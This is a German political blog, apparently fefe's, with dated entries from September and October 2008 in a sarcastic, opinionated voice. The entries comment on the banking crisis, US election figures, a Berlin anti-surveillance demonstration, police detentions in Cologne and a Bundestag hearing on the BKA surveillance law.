By 1999, McCain was championing what he called "rogue state rollback." First on the hit list: Iraq.
Privately, McCain brags that he was the "original neocon." And after 9/11, he took the lead in agitating for war with Iraq, outpacing even Dick Cheney in the dissemination of bogus intelligence about the threat posed by Saddam Hussein.
Und so bleibt da nur ein rauchender Krater, wo eben noch McCain stand. (Danke, Ralf)

Sun Oct 12 2008

[l] Das Gedicht zum Bankendomino. Sehr schön! Wenn man das schön formatiert, sieht es gleich noch besser aus:
Wenn die Börsenkurse fallen,
regt sich Kummer fast bei allen,
aber manche blühen auf:
Ihr Rezept heißt Leerverkauf.
Keck verhökern diese Knaben
Dinge, die sie gar nicht haben,
treten selbst den Absturz los,
den sie brauchen - echt famos!
Leichter noch bei solchen Taten
tun sie sich mit Derivaten:
Wenn Papier den Wert frisiert,
wird die Wirkung potenziert.
Wenn in Folge Banken krachen,
haben Sparer nichts zu lachen,
und die Hypothek aufs Haus
heißt, Bewohner müssen raus.
Trifft's hingegen große Banken,
kommt die ganze Welt ins Wanken -
auch die Spekulantenbrut
zittert jetzt um Hab und Gut!
Soll man das System gefährden?
Da muss eingeschritten werden:
Der Gewinn, der bleibt privat,
die Verluste kauft der Staat.
Dazu braucht der Staat Kredite,
und das bringt erneut Profite,
hat man doch in jenem Land
die Regierung in der Hand.
Für die Zechen dieser Frechen
hat der Kleine Mann zu blechen
und - das ist das Feine ja -
nicht nur in Amerika!
Und wenn Kurse wieder steigen,
fängt von vorne an der Reigen -
ist halt Umverteilung pur,
stets in eine Richtung nur.
Aber sollten sich die Massen
das mal nimmer bieten lassen,
ist der Ausweg längst bedacht:
Dann wird bisschen Krieg gemacht.
Also wenn ihr mich fragt, ist da die Kunst zu nahe an der Wirklichkeit. :-) (Danke, AmigoJack)

Sat Oct 11 2008

[l] Boah, die Demo war großartig. Wir haben uns vorher gedacht, hey, wäre cool, wenn wir 30k Leute kriegen. Waren dann eher so 100k (Schätzung padeluun). Finster waren das viele Leute! Krasse Kacke!
Ich habe wieder eine Menge Fotos gemacht, die werde ich die Tage mal aus der Kamera popeln und ins Netz stellen. Müßt ihr euch noch etwas gedulden. Immerhin: Heise hat ein Foto von meinem Plakat in ihrer Fotostrecke :-]
Der schwarze Block hatte offenbar bei der Planung verkackt, jedenfalls formierte sich da die eine Hälfte hinten friedlich und unkonfrontativ, und die andere Hälfte versuchte nach vorne zu rennen und verstreute sich auf dem Weg. Es gab da ein paar lustige Szenen, als der schwarze und der grüne Block (die Polizei) friedlich nebeneinander neben dem Demozug nach vorne liefen, aber offenbar nie wirklich ankamen. Und so blieb es völlig ruhig bis ganz zum Ende, erst während der Schlußveranstaltung gab es da irgendein Problem, dass die Polizei den einen Ausgang abgeriegelt hatte. Kann ich aber nichts näheres zu sagen.
Anyway, mein persönliches Demo-Highlight war der Rückweg von der Demo. An der Bushaltestelle fragte mich eine gepflegte ältere Dame (offensichtlich eine Touristin, die zur Reichstagskuppel wollte), was denn das für ein Geschrei sei (die Lautsprecherreden von der Abschlußveranstaltung), und als ich ihr erzählte, dass das deine Demo gegen den Überwachungsstaat war, meinte sie, na das sei ja auch mal Zeit, das würde ja immer schlimmer, sei ja schon wie im Osten, die ganzen Telefonate und so. Da war ich erst mal sprachlos :-)
Im Bus fragten mich dann noch zwei Damen aus NRW (?), was es mit meinem Schild auf sich habe, und waren dann auch voll dafür, dass mal jemand was gegen diese ganze Überwachung tut. Zur Krönung kam dann noch eine dritte Dame dazu, eine Berlinerin, die dann lauthals zu meckern anfing über den Politfilz, und dass WIR ja diese ganzen Pfeifen gewählt hätten, und was das für eine Schande sei, wie die Söhne von Diepgen (?!? der Exbürgermeister von Berlin) ja doof wie ein Stück Brot seien :-) Das war echt so ein typischer Berlin-Moment, wie man ihn jedem Touristen nur wünschen kann, da erinnert man sich sein ganzes Leben noch dran.
Zu guter letzt fragte mich auf dem Heimweg noch ein Tourist aus der Schweiz, wogegen ich denn da protestiert hätte, und war erschüttert, als ich ihm erklärte, dass EU-weit die Telefonverbindungsdaten für ein halbes Jahr gespeichert werden. "Auch vom Handy?" fragte er. Ja, auch vom Handy.
Kurz gesagt: wir sind voll im Mainstream angekommen. Die Demo war saugeil. Ich bin auch von einigen ~~Stalkern~~ Bloglesern angesprochen worden, die mich von einem Foto vom letzten Jahr wieder erkannt hatten :-)
Oh übrigens: einige sehr bunte Gruppen waren da: erst mal ein Bündnis gegen das Rauchverbot in Berliner Kneipen (?!?!?), dann die Wavies (Mikrowellen aus dem All töten uns), die Anti-RFID-Christen, die da gegen RFID-Implantate protestierten, und sogar einige Ron Paul Fans waren mit Transparent da. Die müssen alle irgendwo falsch abgebogen sein, wenn ihr mich fragt :-)

Thu Oct 9 2008

[l] Only in America: 15jährige wegen Kinderpornographie verhaftet, weil sie ein Nacktfoto von sich selber gemacht und verschickt hat. Und sie überlegen auch, gegen die Klassenkameraden vorzugehen, die das empfangen haben.
Charges include illegal use of a minor in nudity-oriented material and possession of criminal tools.
Ich persönlich finde ja, die sollen sich mal nicht so haben. Was haben die denn erwartet in einer Schule namens "Licking Valley High School"? :-)

Wed Oct 8 2008

[l] Ooooh wie peinlich: Die Panzerlieferung, die die Piraten da gekapert hatten, die war nicht für Kenia sondern für den Sudan. Sudan, das sind die mit dem Darfur-Massaker, gegen die gibt es ein UNO-Embargo. Und keiner hätte gemerkt, dass die Ukraine denen (über Mittelsmänner in Kenia) Panzer liefert, wenn die Piraten das Boot nicht gekapert hätten. Tja, dumm gelaufen, liebe Ukraine. Da freuen sich die Russen, die eh gerade die Ukraine am Wickel haben, und wo es heiß her geht: der Präsident will gerade das Parlament auflösen.
Aber wer jetzt denkt, nur die Ukraine liefert so Waffen an den Sudan, der sieht sich getäuscht: Der UNO-Sicherheitsrat hat in einer Resolution entschieden, dass die Piraten mal plattgemacht werden sollen. Einstimmig. Da sind offenbar alle Mitglieder in Waffenlieferungen in die Region verwickelt.
[l] Bankendomino.co.uk: Für 50 Milliarden Pfund (knapp 65 Milliarden Euro) verstaatlichen die Briten Anteile von Banken. Vorher gab es einen 40% Kurssturz bei der Royal Bank of Scotland und bei HBOS. Wovon wollen sie damit Anteile verstaatlichen? Royal Bank of Scotland, Barclays und Lloyds TSB.
Die Royal Bank of Scotland überrascht nicht, aber die anderen sind interessant. Barclays hat gerade erst die Brokerspalte von Lehman Brothers übernommen. Ich hatte mich noch darüber lustig gemacht, dass die selber am Abgrund stehen. Aber da sieht man mal, wie solche staatlichen Rettungsaktionen nach hinten los gehen. Barclays hat offensichtlich darauf spekuliert, dass sie eh gerettet werden, und dann mit Geld, das sie nicht hatten, die Lehman-Trümmer gekauft. Und daher können solche Rettungsaktionen nicht funktionieren. Banker leben vom Spekulieren. Wenn man denen eine Rettungsleine hinwirft, dann versuchen die erst mal mit Spekulationen auf die Länge der Leine Profit zu machen.
Von Lloyds TSB hieß es bisher nicht, dass die pleite sind. Aber die haben kürzlich HBOS "retten" müssen. Zwei Möglichkeiten. Entweder die waren pleite und das lief analog zu Barclays, oder die haben einfach keinen Bock gehabt, HBOS retten zu müssen (das kam ja auch auf Brokern der Regierung zustande), und jetzt wollen die quasi ihr Kapital zurück haben. Und die Zeit dafür ist hervorragend, denn die Regierung steht mit dem Rücken zur Wand. Wenn die geschickt agieren, müssen sie vermutlich nicht mal wirklich Anteile an den Staat abgeben.
Tja, wie man in Finanzkreisen so schön sagt: there's blood in the streets. Die perfekte Gelegenheit für Käufe. :-)
Oh, übrigens, lustiges Detail am Rande: ein paar Tage nach der AIG-"Rettung" haben die erst mal für ne halbe Million Dollar eine fette Strandparty in Kalifornien geschmissen und die Regierung ist gerade ein bisschen ungehalten deshalb.
Details of the week-long getaway enraged legislators at a congressional hearing yesterday where AIG's former bosses were accused of spending taxpayers' money on pedicures, golf games and cocktails.
Und der Lacher ist: beide Seiten haben Recht! Aus Sicht der AIG-Bosse war das gerade der größte Erfolg ihrer Karrieren, sie haben das Schiff in den Boden gerammt, aber die Pleite verhindert.

Sat Oct 4 2008

[l] Yeah, heute habe ich 10 Stunden mit Telekom-Hotline-Flipper verbracht. Toll, wie die sich immer gegenseitig die Schuld zuschieben können. Höhepunkt: Congstar erklärte mir, sie können kein Trouble Ticket aufmachen, das müsse die Telekom-Störungsstelle machen. Und die war dauerbesetzt und hatte eine automatische Weiterleitung zum Vertrieb. Immer wenn ich da anrief, kam ich beim Vertrieb raus.
Am Ende hat sich das Problem von selbst gefixt, aber die Reparatur-Maßnahmen von Congstar haben es mehr kaputt gemacht. Die haben mir ein Einmal-Passwort vergeben, aber falsch diktiert ("Null" als "Groß O, nicht Null" durchgesagt).
Am meisten ärgere ich mich ja über mich selber, denn ich ahnte das schon, aber habe es nicht ausprobiert, weil ich mir dachte: hey, SO blöd KÖNNEN die nicht sein!

Tue Sep 30 2008

[l] Bei der großen Depression haben sie ein Gesetz gemacht, dass den Banken verboten hat, mit den Sparbuch-Einlagen ihrer Kunden zu zocken. Das haben sie offenbar gerade aufgehoben, diese Regel. Damit wäre jetzt der richtige Zeitpunkt dafür, das Geld vom Konto zu nehmen und Hamsterkäufe zu tätigen. Au weia. (Danke, Friedrich)

Mon Sep 29 2008

[l] So, liebe Freunde, es ist mal wieder an der Zeit für ein paar politische Aufrufe. Der erste: Initiative Artikel 1a Grundgesetz. Hierbei geht es darum, das Grundrecht auf Teilhabe am allgemeinen gesellschaftlich-sozialen Leben im Grundgesetz zu verankern. Wir sind eh daran gebunden, weil das Teil der Menschenrechte ist, und unsere Junta hat in einem Moment der Unachtsamkeit die UNO-Menschenrechtsdeklaration unterzeichnet. Wenn man sich aber die Hartz IV Realität im Lande anschaut, ist es Zeit, da mal wieder dran zu erinnern, und daher dieser Aufruf jetzt. Die Erstunterzeichnung ist am 2. Oktober im Haus der Demokratie und Menschenrechte in Berlin.
Die andere Sache ist die Großdemonstration "Freiheit statt Angst" am 11. Oktober in Berlin. Wir hatten ja schon letztes Jahr eine gut besuchte Demo, dieses Jahr muss das noch größer werden, weil in der Zwischenzeit noch mehr kaputt gemacht wurde. Hier noch ein Aufruf, dieses Jahr gibt es auch eine Demo-Bus-Aktion für Nicht-Berliner. Auch Netzpolitik.org ruft auf, und hier gibt es auch schon erste Transparente zu begutachten. Kommt alle. Bringt eure Familie, Freude, Bekannten und Kollegen mit. Das ist wichtig! Das ist auch ansonsten eine hervorragende Gelegenheit, um in eurem Bekanntenkreis das Problem zu thematisieren.

Sun Sep 28 2008

[l] Die Palin hat sich bei einem CBS-Fernsehinterview SO dämlich angestellt, das jetzt sogar schon Republikaner ihren Rücktritt fordern, "aus persönlichen Gründen".
Und McCain hatte ja seinen Wahlkampf "suspendiert", um sich die Wirtschaft zu retten (bwahahaha). Das einzige, was dem tatsächlich zum Opfer fiel, war sein Auftritt bei David Letterman. Und der ist ja nun nicht gerade auf den Mund gefallen und hat dann in der Sendung mehrere Minuten am Stück über McCain gemeckert und sogar den Olberman eingeladen, der sich vor allem durch Bush-Bashing einen Namen gemacht hat.
Und wo wir gerade bei Youtube waren: hier sind ein paar Auszüge des Palin-Couric-Interviews.

Tue Sep 23 2008

[l] Die Kölner Polizei hat sich anläßlich des Naziaufmarsches wohl gedacht, das wäre irgendwie passend, das Heiligendamm-Reichssicherheitshauptamt-Arsenal nochmal aufzufahren. Gut, Bundeswehreinsatz gab es wohl nicht, aber es gab Festnahmen mit Käfigen (30 Menschen auf 36 qm) mit Verweigerung von Anwalt, Toilette oder Anruf bei den Eltern. Natürlich haben sie wieder den Anwaltlichen Notdienst auflaufen lassen, als seien das nervige Störenfriede.
Über Stunden legt sie die Namen von mehr als 70 Betroffenen immer wieder der Polizei mit der Bitte vor, ihr ein Gespräch zu ermöglichen. Sie harrt bis 1 Uhr 45 am Morgen in der Gefangenensammelstelle aus - vergeblich.
Das Grundgesetz schreibt vor, dass nur ein Richter über die Zulässigkeit und Fortdauer einer Freiheitsentziehung zu entscheiden hat. "Bei jeder nicht auf richterlicher Anordnung beruhenden Freiheitsentziehung ist unverzüglich eine richterliche Entscheidung herbeizuführen", legt Artikel 104 fest.
Eine Aufgabe, die eigentlich Richterin Erika Nagel vom Amtsgericht Köln übernehmen sollte. Wie ihr Pressesprecher, Jürgen Mannebeck, mitteilt, sind ihr im Lauf des Samstagabends aber nur sechs Personen vorgeführt worden - die sie ohne Prüfung des Sachverhaltes umgehend freigelassen hat, weil sie bereits zu lange festgehalten worden waren. Eingekesselt waren allerdings 400 Demonstranten. "Gegen 22.15 Uhr ist Frau Nagel dann gegangen, weil sie gesagt hat, sie kann sowieso nichts mehr tun", so Mannebeck.
Das muss man sich mal auf der Zunge zergehen lassen! Die Richterin hat den Eindruck, sie könne eh nichts mehr tun gegen die Polizeiwillkür! Krasse Scheiße! Und falls jemand glaubt, das betrifft nur erwachsene radikalisierte Steinewerfer:
Unter den Eingeschlossenen befinden sich neben zahlreichen Linksautonomen auch drei Kinder und 72 Jugendliche.
Ach watt, kein Grund zur Panik, mit so ein bisschen Kollateralschaden haben wir doch am Hindukusch umzugehen gelernt!1!!
Aber immerhin ist die Polizei noch nicht so vollständig weggetreten, dass sie glaubt, das hätte jetzt keine Konsequenzen:
Die Polizei rechnet jetzt mit Strafverfahren. Man bitte deshalb um Verständnis, dass auf weitere Fragen bis zur Klärung des Sachverhaltes keine Antwort erfolgen könne.
Die haben das nur schon oft genug gemacht, um zu wissen, dass in unserem Unrechtssystem keine echten Konsequenzen drohen. War jemand dabei und kann mir sagen, ob die Kölner Prügelcops wenigstens ordentlich beschriftet waren und man jetzt die Straftaten auf die einzelnen Täter rückverfolgen kann?
Was für eine Schande, auf einer Anti-Nazi-Demo solche Nazi-Methoden anzuwenden. Aber dafür fordert natürlich niemand irgendwas. Warum auch. Die sind ja gerade damit beschäftigt, den Rausschmiss der KfW-Vorstände zu fordern. Ich weiß ja nicht, wie ihr das seht, aber die KfW-Vorstände haben noch niemanden unter menschenunwürdigen Umständen seiner Freiheit beraubt.
Update: Offenbar waren sie nicht so beschriftet, dass man Rückschlüsse auf die Person schließen konnte. Ganz toll.

Sun Sep 21 2008

[l] Das Muster der Verschwörungstheorie ist ja üblicherweise, bei völlig unfassbar dämlichen Entscheidungen davon auszugehen, dass das mit Absicht geschehen ist, und dann zu überlegen, warum das so gewesen sein könnte.
Heute wurden wir mal wieder von der Realität überholt: die KfW-Überweisung an Lehman geschah offenbar in voller Absicht.
Am Freitag vorvergangener Woche waren Mitarbeiter der KfW zusammengekommen und hatten über die Entwicklung von Lehman und die anstehende Zahlung beraten. In allen Medien war zu dieser Zeit die drohende Insolvenz der amerikanischen Investmentbank schon Thema. Wie es heißt, habe man festgestellt, dass „Lehman nicht so gut aussieht“, und eine Entscheidung getroffen: Die Überweisung, die ihren Ursprung in einem gewöhnlichen Devisen-Swap-Geschäft hatte, wird noch ausgeführt; Neugeschäft wird nicht mehr eingegangen. Die sich über das Wochenende zuspitzende Lage von Lehman sowie die Berichte in der Nacht von Sonntag auf Montag über deren Insolvenz haben die Verantwortlichen in der KfW offenbar nicht bewogen, die Überweisung noch zu stoppen.
Ich finde das nicht vollständig schlecht. Immerhin sind sie nicht so zynisch, bei einer kurz vor der Pleite stehenden Firma die Pleite noch zu forcieren, indem sie Zahlungen verschleppen, wie das sonst im Finanzwesen durchaus üblich ist. Hier sind also Reste von Menschlichkeit vorhanden. Die haben sich nur in der Branche geirrt, die Herren. Im Banking braucht man keine Menschen mit moralischen Wertvorstellungen.
Aber ein Punkt noch. Wenn das eine ganz normale Zahlung im Rahmen eines Geschäfts war, wo Lehman ihren Teil gemacht hat, dann ist völlig klar, dass sich das der Insolvenzverwalter dann holt, wenn man das verschleppt. Da gewinnt man nichts durch (außer dass man in der Zwischenzeit mit der Kohle spekulieren gehen kann, natürlich). Insofern ist mir eh nicht so klar, was das Geheule soll. Vertrag ist Vertrag, auch wenn die Gegenseite pleite geht.
Update: Es handelt sich um ein Devisentausch, d.h. die hatten vertraglich ausgemacht, dass die KfW n Milliarden Euro überweist, und Lehman überweist m Milliarden Dollar. Da hätte man in der Tat noch warten können. Die Frage ist halt, ob Lehman noch überwiesen hat oder nicht. Und wie sie bei einer 350 Millionen Euro Überweisung auf einen Schaden von 536 Millionen kommen.

Thu Sep 18 2008

[l] Na das hat sich ja mal wieder gelohnt. Justice was served. Der Rechtsstaat hat obsiegt. Nach zwei Jahren Untersuchung, 24 Sitzungen, 49 vernommenen Zeugen und 470 Seiten Bericht kommt der Verteidigungsausschuss zu dem Ergebnis, dass Kurnaz' Vorwürfe weder bestätigt noch widerlegt werden können.
Kurnaz habe durchaus einen glaubwürdigen Eindruck gemacht. Aber in dem konkreten Fall habe es keine Beweise für seine Vorwürfe gegen zwei Soldaten des Kommandos Spezialkräfte (KSK) gegeben.
Daher optimiert eine moderne Junta wie unsere ihre Foltermethoden ja auch darauf, dass sie keine Spuren hinterlassen.
Aber nicht dass jetzt von euch einer an dem Ausschuss zweifelt. Die Leute haben da vorbildlich unabhängig entschieden:
Lamers sagte, er [der Einsatz der KSK in Afghanistan] sei politisch richtig gewesen und die Soldaten hätten "gute Arbeit in einem schwierigen Umfeld" geleistet.
WTF?!? Unglaublich. Und da wundern die sich über Politikverdrossenheit!

Wed Sep 17 2008

[l] Wisst ihr eigentlich, wer McCain in Wirtschaftsfragen berät? Na? Kommt ihr NIE drauf! Carly Fiorina. Ja, DIE Carly Fiorina, die eigenhändig HP mit Compaq fusioniert und damit beide kaputt gemacht hat.
[l] Keine kriminelle Vereinigung kann es zulassen, dass jemand über ihre Machenschaften auspackt. So mußte auch Becksteins Junta etwas tun, als die Piratenpartei Belege veröffentlichte, dass die CSU den Bayerntrojaner ohne gesetzliche Grundlage eingesetzt hat. Nun war das im Januar, aber mit der Effizienz der italienischen Mafia kann die Beckstein-Mafia halt nicht mithalten, und so hat es bis jetzt gedauert, bis sie ihre Knochenbrecher losgeschickt haben: Hausdurchsuchung bei Presseprecher der Piratenpartei Bayerns, passenderweise am 11. September. Immerhin ist ja bald Bayernwahl. Verbreitet diese Meldung mal schön weiter, möglichst weiträumig und noch vor der Wahl. Solche Leute sind da an der Regierung! Abwählen, jetzt! Die Bayernpartei ist seriöser als diese CSU! Weder christlich noch sozial noch eine Union.
Und vielleicht kann mir auch mal ein Jurist helfen hier. Nachdem die CSU ja damit zugegeben hat, dass sie ihre Bürger illegal trojanisiert hat, wäre es damit jetzt legal, wenn ich sie hier als kriminelle Vereinigung bezeichnen würde? Da heimliche Verletzung der Wohnung auch Terror verbreitet, würde ich sie auch gerne als terroristische Vereinigung bezeichnen. Wie legal ist das nach diesem Schuldeingeständnis der CSU jetzt? Vielleicht kann ja Herr Vetter dazu mal Stellung nehmen, der soll ja die Verteidigung übernommen haben.
Update: Hups, kaum blogge ich die, bricht ihr Server weg. Ist halt nicht jede Software so skalierbar wie mein Blog hier :-)
Andere Links: Netzpolitik.org; Frankfurter Rundschau, Heise, Golem.
Übrigens: EIN GLÜCK, dass wir das BKA-Gesetz bisher verzögert gekriegt haben, denn da könnt ihr mal einen drauf lassen, dass die da keine offene Durchsuchung gemacht hätten, wenn sie auch verdeckt reingekommen wären.

Tue Sep 16 2008

[l] Das Bankendomino kommt langsam bei den dicken Fischen an: Goldman Sachs Quartalsgewinn bricht um 75% ein. Es gab ja schon Gerüchte, dass die die nächsten sein würden. Dann ist Morgan Stanley die letzte unabhängige Wallstreet-Investmentbank.
Update: McCain beklagt "Gier und Korruption" an der Wall Street. HAHAHAHAHAHAHAHA, ausgerechnet McCain! Bwahahahaha, das haben doch die Republikaner so eingerichtet, als sie den Markt "dereguliert" haben! Das ist ja echt zum Totlachen. Was für eine Witzfigur, dieser McCain.
Und noch ein Schenkelklopfer: Barclays will die Brokersparte von Lehman Brothers kaufen. Barclays… DIE Barclays, die sich von Bear Stearns Klärschlamm haben andrehen lassen, und die selber kurz vor dem Crash stehen? Großartiges Entertainment!
Und noch einer zum Lachen:
Sorgen um das Bankensystem seien "nicht gerechtfertigt", sagte Bundesbank-Präsident Weber. Finanzminister Steinbrück bekräftigte, das deutsche System sei stabil. Die Äußerungen sind der Versuch, die Aufregung über die US-Bankenkrise zu dämpfen.
HAHAHAHAHAHA
Oh und noch ein interessantes Detail: Lehman hatte ja auch eine Deutsche Tochter, die Bafin anläßlich der Lehman-Pleite zugemacht hat. Das ist ein klarer Fall für den Einlagesicherungsfonds der deutschen Privatbanken, und ob der tatsächlich für echte Krisen aufkommen kann, oder ob er bloß eine PR-Luftnummer war, das wird sich jetzt zeigen. Achtet mal in den nächsten Tagen darauf, ob der Steinbrück sein Scheckbuch zückt :-)
Und so verkündet Captain Obvious in seiner Funktion als Sprecher des Weltwährungsfonds: "Der Internationale Währungsfonds erwartet als Folge der Finanzkrise einen enormen Umbruch im Finanzsektor". No Shit, Sherlock!
Einen hab ich noch: Lehman ist ja nicht nur eine Investment-Bank, sondern haben auch selbst Anleihen und Derivate rausgegeben. Die drohen jetzt natürlich auch alle zum Totalausfall zu werden. Das ist das erste Mal, das Zertifikateanlegern wegen Pleite des Emittenten Verlust droht. Und, wichtiges Detail dabei: Zertifikate sind nicht vom Einlagensicherungsfonds gedeckt! Der deckt nur Konten ab!

Mon Sep 15 2008

[l] Ich war heute von 10 bis 16 Uhr im Bundestag, um der öffentlichen Innenausschuß-Expertenbefragung zum Thema BKA-Gesetz beizuwohnen. Mich hat überrascht, dass von den Experten tatsächlich die meisten Argumente gebracht wurden. Der Endeindruck ist allerdings, dass sie das alles zwar anhören, dann vollständig ignorieren, das Gesetz so durchwinken, und wir dann wieder zum Verfassungsgericht müssen. Im Grunde war das eine einzige Liste an Gründen, wieso das Gesetz so nicht geht, in den meisten Fällen wieso es nicht verfassungskonform ist. Das ist überraschend, hatten die tollen Abgeordneten doch schlicht weite Teile des Gesetzes per copy&paste aus dem Verfassungsgerichtsurteil übernommen. Aber auch beim Kopieren kann man sich offensichtlich inkompetent anstellen.
Die Kernpunkte, die ich mitgenommen habe:
- "Die Sauerländer" ist jetzt unser 9/11. Der Ziercke hat sich nicht entblödet, über 10 Mal die Sauerländer zu zitieren, und damit irgendwelche Dinge rechtfertigen zu wollen. So erzählte er, dass sie die Sauerländer abgehört haben, und so wussten, wann sie zugreifen müssen, aber sie hatten nicht gehört, dass jemand den Raum verlassen hatte, und so konnte der fliehen, und hat dann später auf einen BKA-Beamten geschossen. Er verstieg sich dann zu der Aussage, optische Wohnraumüberwachung hätte Menschenleben retten können (obwohl der Beamte noch lebt, sie den Terroristen erwischt haben, laut Zierckes eigener Aussage die LKAs auch optisch überwachen dürfen und wunderbar mit dem BKA zusammenarbeiten, insbesondere auch in diesem Fall, aber offenbar nicht gut genug für die Weitergabe der optischen Überwachungsdaten).
- Der aktuelle Kriegsschauplatz ist nicht, ob wir den Bundestrojaner kriegen, sondern ob sie heimlich in die Wohnung einbrechen dürfen, um ihn zu installieren. Der Bundestrojaner ist anscheinend schon Konsens. Einige der Sachverständigen haben zwar angeregt, das noch mal generell zu überdenken, aber sahen das dann selber als nicht realistisch an "so spät im Gesetzgebungsprozess".
- Ziercke hat so lächerlich schlechte Argumente gebracht, dass es mir die Zehennägel hochgerollt hat. Mit so plumpen Geschichten wäre er schon an einem durchschnittlichen Fünftklässler gescheitert. Ich bin schockiert, dass die Abgeordneten sich von so einem Stuß überzeugen lassen.
- Die CDU hat alle Vorurteile bestätigt. Da kam dann als Frage ungefähr sowas: "Wenn die Polizei einen Terroristen abhört, wie der seinem Anwalt gesteht, morgen einen Anschlag zu verüben, dürfen wir das dann wirklich nicht verwerten?!?!?" Unter aller Gürtellinie, wie die sich da aufgeführt haben. Lustig war auch, dass die CDU offenbar ihre Hofexperten eingeladen hat, die nur von der CDU befragt wurden, während die anderen alle die echten Experten befragt haben. Der eine CDU-Experte fand dann z.B., dass das verdeckte Betreten der Wohnung auch ohne Verfassungsänderung ginge, wenn man den einen oder anderen Paragraphen geschickt auslegt. Der andere meinte, es bestünde ja kein Grund, an der Redlichkeit der BKA-Beamten zu zweifeln. Nee, klar.
- Die SPD hat auf ganzer Linie versagt, aber von denen war ja auch nichts zu erwarten.
- Die FDP hat die Frau Piltz geschickt, ich hätte mir die Leutheusser-Schnarrenberger gewünscht, die Piltz hat da irgendwelche formaljuristischen Detailfragen gestellt ("was bedeutet in diesem Zusammenhang das Wort 'aus'?") und sich ansonsten ein paar rhetorische Scharmützel mit dem Ziercke geführt, der übrigens auf gute Fragen einfach damit reagierte, dass er angab, die Frage nicht zu verstehen. Die Piltz stellte dann die exakt gleiche Frage (drei geschachtelte Schwurbelsätze) nochmal, und Ziercke verstand sie immer noch nicht, und das war das. Suuuuuper. Die FDP hat also auch verloren.
- Die Linksfraktion hat zu meinem Entsetzen auch völlig versagt. Die haben Petra Pau geschickt, die dann drei Fragen stellte und zwei Stunden vor Ende der Befragung ging. Die Fragen waren zwar nicht so dämlich wie bei der SPD, aber konnten halt inhaltlich nicht überzeugen. Da hatte ich mir deutlich mehr erhofft. Das war ein sehr schwaches Bild.
- Die Grünen haben den Herrn Wieland geschickt, der ja bisher nicht durch Kompetenz aufgefallen ist in Sachen Innenpolitik. Der war der einzige, der da zumindest rhetorisch mal ein bisschen auf den Tisch gekloppt hat. Die Fragen haben zwar auch keine neuen Erkenntnisse zu Tage gefördert, aber er hat da zumindest Opposition gemacht. Lustiges Detail, aus dem Gedächtnis zitiert: es ging um die Frage, ob die Benachrichtigungsregelungen im Gesetz nicht dazu führen würden, dass niemand seinen Rechtschutz wahrnehmen könnte. Daraufhin meinte Wieland, Wiefelspütz (der neben ihm sass!) habe gesagt, das sei Absicht, und "Kinder und der Wiefelspütz sagen die Wahrheit" :-)
- Der Schaar war da, konnte aber nicht überzeugen. Hat da zwei-drei wichtige Punkte gesagt, aber kam dann gegen Ende mit einer echt verstörenden Ansage. Es ging um die Frage der Benachrichtigungen, und da steht im Gesetz drin, dass sie nicht benachrichtigen müssen, wenn die Person nur umständlich zu ermitteln wäre, und die nur am Rande betroffen sind. Da meinte Schaar zu, Leute, bei denen die Identifikation aufwendig wäre, seien durch die Recherchen womöglich mehr beeinträchtigt als durch das Abhören selbst (WIE BITTE?!?) und daher sei das schon OK, wenn man dann nicht benachrichtigt.
Überhaupt gibt es da diese Klausel, dass das BKA bei geringfügigen Fällen entscheiden darf, dass der Abgehörte wahrscheinlich KEIN INTERESSE (I kid you not!) daran hätte, benachrichtigt zu werden, und das dann lassen. Daher denke ich, der CCC sollte mal zum Congress einen Brief-Vordruck machen, mit dem man dem BKA mitteilen kann, dass man IN JEDEM FALL daran interessiert ist, über Abhörvorgänge informiert zu werden. Unglaublich.
Die Sachverständigen haben kein gutes Haar an dem Gesetz gelassen. Es war klar: wenn sie das reparieren wollen, wäre das ein Totalschaden-Aktion, wegschmeißen und neumachen. Daher bin ich mir sicher, dass die das Gesetz genau so kaputt durchwinken werden, und dann werden wir wieder nach Karlsruhe gehen müssen. Der Grünen-Typ hat die Sachverständigen auch mit den Worten begrüßt, er sei dankbar, dass sie nach den ganzen letzten Gesetzen, wo ihre Vorschläge sämtlichst verworfen worden seien, immer noch für diese Anhörungen zur Verfügung stünden. So läuft das da ab. So wird bei uns Politik gemacht.
Oh, eine wichtige Sache noch, die mir bisher nicht so klar war. Das Verfassungsgericht hat bei den Tagebuch-Regelungen entschieden, dass strafrechtlich relevante Erkenntnisse grundsätzlich nicht in den Kernbereich der privaten Lebensführung fallen. In Verbindung mit dem "Richterband"-Vorschlag heißt das: die hören weiterhin alles ab, der Richter schneidet dann das Stöhnen während des Koitus und das Schnarchen heraus, und das Geständnis dazwischen wird verwertet. Genau so wird das ablaufen. Oh und natürlich sind keine Mittel vorgesehen, um die Richter zu finanzieren, die das machen sollen, bzw die dann nötigen Dolmetscher.
Die schriftlichen Stellungnahmen gibt es hier als PDF, falls ihr da mal reingucken wollt.
Ein Highlight gab es noch mit Herrn Dr Roggan, der sich die ersten fünf Stunden eher blass, zurückhaltend und wenig kontrovers gab, der aber in den letzten Minuten noch einen echten Knaller brachte, als er meinte, die Daten dürfen man nicht nur nicht an Länder weitergeben, bei denen dem Betroffenen die Todesstrafe drohe, sondern auch nicht an Folterländer wie die USA oder die Türkei. Niemand reagierte entsetzt darauf, ich bin mal gespannt, ob sie das aus dem offiziellen Transkript raus zensieren.
Hier mal ein paar Ziercke-Stilblüten:
Hier kann gar nicht davon die Rede sein, dass das gegen Unbescholtene eingesetzt wird!
Verschlüsselung schafft strafverfolgungsfreie Räume!
Es geht nicht um den intelligenten Internetnutzer, sondern um die Netzwerke, da kommt man immer irgendwie rein.
Wer heute VoIP mit Skype macht, kann sich sicher sein, dass das nicht abgehört werden kann. [Ja! Hat er schon wieder gesagt!!]
… welche Hindernisse vorliegen, zum Beispiel Firewall, Antiviren, … [er weiß also genau, dass er da Malware baut]
Wir brauchen verdeckte Einbrüche, damit wir sicher sind, den richtigen Rechner zu erwischen!
Dann wären ja alle Polizeien weltweit Geheimdienste! [auf die Frage nach den nachrichtendienstlichen Befugnissen, die seine Behörde da kriegen soll]
Wir arbeiten im Moment mit Methoden aus der Steinzeit! Es dauert 8 Monate, bis wir einen Server in China öffnen können, und dann finden wir, dass die Daten seit 7 Monaten gelöscht sind!
Gefahr im Verzug braucht man für den Bundestrojaner, weil man ja nur in der Minute zugreifen kann, wo derjenige online ist!
Die Onlinedurchsuchung hat ja mit dem Kernbereichsschutz nichts zu tun. [ach ja?]
[Auf die Frage, ob sie denn mit der Rasterfahndung schon Erfolge hatten] Mit der Rasterfahndung haben wir Verdächtige identifiziert, das sehen wir als großen Erfolg. Was erwarten Sie den, was wir da erreichen können? [Naja, vielleicht etwas mehr als ein Verdacht? Wie wäre es mit einem Täter?]
